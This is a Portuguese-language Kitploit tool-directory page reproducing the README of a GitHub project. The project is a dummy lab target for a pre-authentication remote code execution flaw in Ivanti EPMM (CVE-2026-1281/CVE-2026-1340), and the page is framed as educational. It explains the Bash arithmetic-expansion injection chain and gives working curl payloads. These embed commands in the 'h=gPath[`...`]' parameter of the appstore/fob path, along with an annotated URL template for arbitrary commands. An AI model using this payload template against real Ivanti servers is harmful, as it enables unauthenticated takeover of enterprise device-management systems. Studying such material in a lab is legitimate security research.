Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Uma aplicação de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança. | Kitploit
Ferramentas/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Uma aplicação de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança.

Ver Repositório
312há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Alvo Dummy de RCE pré-autenticação Ivanti EPMM

Um aplicativo de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança.

Visão Geral da Vulnerabilidade

Esta vulnerabilidade explora o comportamento da expansão aritmética do Bash. Quando uma variável contendo uma referência a outra variável é usada em contexto aritmético, e essa variável referenciada contém um índice de array com substituição de comando, o comando é executado.

A Cadeia de Exploração

  1. A requisição contém st=theValue (string literal "theValue" com preenchimento)
  2. A requisição contém h=gPath[\comando`]` (comando no índice do array)
  3. O script Bash analisa pares chave=valor em um loop, atualizando theValue a cada iteração
  4. gStartTime é definido como a string literal "theValue"
  5. Após o loop, theValue contém gPath[\comando`]`
  6. Quando [[ ${currentTime} -gt ${gStartTime} ]] é avaliado:
    • ${gStartTime} → "theValue" (string)
    • O contexto aritmético trata theValue como referência de variável
    • theValue → gPath[\comando`]`
    • O índice do array aciona a substituição de comando → RCE!

Início Rápido

# Compilar e iniciar o container
docker-compose up --build -d

# Verificar se está em execução
curl http://localhost:8180/health

Testando a Vulnerabilidade

1. Teste de Criação de Arquivo

Crie um arquivo para provar a execução de comandos:

# Payload codificado em URL: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Verificar se o arquivo foi criado
cat artifacts/poc

2. Teste Baseado em Tempo

Verifique com um comando sleep:

# Deve levar ~5 segundos para responder
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. Execução de Comando Personalizado

# Escrever conteúdo personalizado
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

Estrutura da URL

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMANDO%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ Payload: gPath[`COMANDO`]
                               │      │              └─ Timestamp final (quaisquer 10 dígitos)
                               │      └─ CRÍTICO: literal "theValue" + 2 espaços (10 caracteres no total)
                               └─ Índice da chave (qualquer valor)

Depuração

# Visualizar logs do container
docker-compose logs -f

# Obter um shell no container
docker exec -it ivanti-epmm-vuln /bin/bash

# Verificar logs de erro do nginx
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

Limpeza

docker-compose down
rm -rf artifacts/*

Referências

  • Postagem do Blog do WatchTowr Labs

Aviso Legal

Isto é apenas para fins educacionais e de testes de segurança autorizados. Não use contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.

Baixar ferramenta